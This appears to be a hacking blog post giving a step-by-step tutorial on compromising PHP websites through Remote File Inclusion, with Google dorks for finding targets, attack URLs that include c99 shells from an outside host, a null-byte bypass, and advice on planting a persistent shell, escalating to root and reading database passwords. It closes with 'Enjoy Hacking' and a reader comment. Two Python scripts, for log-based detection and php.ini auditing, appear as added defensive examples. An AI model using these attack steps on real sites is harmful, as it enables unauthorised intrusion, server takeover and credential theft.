How to Hack a Website by Remote File Inclusion?
RFI is one of the popular web hacking methods used by hackers in today's world. Remote File Inclusion occurs when a remote file, usually a shell (a graphical interface for browsing remote files and running your own code on a server), is included into a website, which allows the hacker to execute server-side commands as the current logged-on user and to access files on the server. With this power the hacker can go on to use local exploits to escalate his privileges and take over the whole system.
Many servers are vulnerable to this kind of attack because of PHP’s default settings of register_globals and allow_url_fopen being enabled. Although as of PHP 6.0, register_globals has been deprecated and removed, many websites still rely on older versions of PHP to run their web applications. Now let’s go through the steps a hacker would take to exploit this type of vulnerability in a website.
1. First the hacker would find a website that gets its pages via the PHP include() function and is vulnerable to RFI. Many hackers use Google dorks to locate servers vulnerable to RFI. A Google dork is the act of using Google’s provided search tools to help get a specific search result.
2. Websites that include pages have a navigation system similar to:
http://target-site.com/index.php?page=PageName
3. To see if the page is vulnerable, the hacker would try to include a site instead of PageName like the following:
http://target-site.com/index.php?page=http://google.com
4. If the Google homepage shows up on the website, then the hacker knows the website is vulnerable and would continue to include a shell.
5. A couple of the most popular shells are c99 and r57. A hacker would either upload them to a remote server or just use a Google dork to locate them already online and insert them. To find a shell the hacker would search Google for: inurl:c99.txt. This will display many websites with the shell already up and ready to be included. At the end of the URL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell and not cause any problems. The new URL with the shell included would look like:
http://target-site.com/index.php?page=http://site.com/c99.txt?
6. Sometimes the PHP script on the server appends “.php” to the end of every included file. So if you included the shell, it would end up looking like “c99.txt.php” and not work. To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server to ignore everything after c99.txt.
7. In step one, I told you that hackers use Google dorks to look for sites possibly vulnerable to RFIs. An example of a Google dork would be: allinurl:.php?page=. This looks for URLs with .php?page= in them. This is only an example and you most likely won’t find any vulnerable sites with that search. You can try switching around the word “page” with other letters and similar words. Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFI vulnerabilities in site content management systems and search for websites that are running that vulnerable web application with a Google dork.
8. If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen similar to the following:
The shell will display information about the remote server and list all the files and directories on it. From here the hacker would find a directory that has read and write privileges and upload the shell, but this time as a .php file so that in case the vulnerability is fixed, he will be able to access it later on.
9. The hacker would next find a way to gain root privileges on the system. He can do this by uploading and running local exploits against the server. He could also search the victim server for configuration files. These files may contain usernames and passwords for the MySQL databases and such.
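The request shapes in steps 3 to 6 (a URL where a page name belongs, and a %00 in the value) are easy to spot in web server access logs. The following is an added detection example, not code from the original post; the log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qsl

# Request line inside a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# http(s) and ftp(s): the URL wrappers that allow_url_fopen governs.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?)://", re.I)

# Constructed sample log lines (documentation IPs and domains), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=http://example.org/ HTTP/1.1" 200 48211',
    '203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /index.php?page=http%3A%2F%2Fexample.net%2Fx.txt%3F HTTP/1.1" 200 913',
    '203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "GET /index.php?page=contact%00 HTTP/1.1" 404 310',
]


def findings_for(line):
    """Return (parameter, reason) pairs for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    # Everything after the first '?' is the query string; later '?' stay in the value.
    query = match.group(1).partition("?")[2]
    found = []
    # parse_qsl percent-decodes, so encoded probes (http%3A%2F%2F, %00) are caught too.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_VALUE.search(value):
            found.append((name, "remote URL as parameter value"))
        if "\x00" in value:
            found.append((name, "null byte in parameter value"))
    return found


def scan(lines):
    """Return (client_ip, parameter, reason) for every suspicious parameter."""
    hits = []
    for line in lines:
        ip = line.split(" ", 1)[0]
        hits.extend((ip, name, reason) for name, reason in findings_for(line))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Parameters that legitimately carry URLs (redirect targets, for example) will also match, so in production restrict the check to the parameters your application passes to include().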
To protect yourself from RFI attacks, simply make sure you are using up-to-date scripts, and make sure your server's php.ini file has register_globals and allow_url_fopen disabled.
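An added example (not from the original post) that audits a php.ini for the settings named above, showing a weak file beside a corrected one. It also checks allow_url_include, the directive that since PHP 5.2 controls whether include() may load URLs, which the post does not mention; the sample files and function names are constructed for illustration.

```python
import re

# Directives that should be off: the two the post names, plus allow_url_include
# (an addition made by this example).
REQUIRED_OFF = ("register_globals", "allow_url_fopen", "allow_url_include")
# PHP's built-in values when a directive is absent from php.ini.
DEFAULTS = {"register_globals": False, "allow_url_fopen": True,
            "allow_url_include": False}

# "name = value", with an optional trailing ';' comment. Lines that start
# with ';' (comments) or '[' (section headers) do not match.
LINE = re.compile(r"^\s*([A-Za-z_][\w.]*)\s*=\s*(.*?)\s*(?:;.*)?$")

# Constructed sample configurations.
WEAK_INI = """\
; weak: both settings the post warns about are enabled
register_globals = On
allow_url_fopen = On
"""
HARDENED_INI = """\
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off   ; never load include() targets from URLs
"""


def ini_bool(raw):
    """Interpret a php.ini boolean: on/true/yes or a non-zero integer is true."""
    value = raw.strip().strip("\"'").lower()
    if value in ("on", "true", "yes"):
        return True
    try:
        return int(value) != 0
    except ValueError:
        return False


def effective(ini_text):
    """Effective state of the audited directives; the last assignment wins."""
    state = dict(DEFAULTS)
    for line in ini_text.splitlines():
        match = LINE.match(line)
        if match and match.group(1) in state:
            state[match.group(1)] = ini_bool(match.group(2))
    return state


def audit(ini_text):
    """Return the directives that are still enabled, explicitly or by default."""
    state = effective(ini_text)
    return [name for name in REQUIRED_OFF if state[name]]
```

Note that an empty php.ini still fails the audit, because allow_url_fopen is enabled by default; run the check against the file that `php --ini` reports as loaded.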
Enjoy Hacking :D
Hi Karan, did your AdSense account get banned? I am a very old viewer of this site. First you showed your AdSense ads, but not now. Why?
@Anonymous
Yes anony, I got banned by Google AdSense.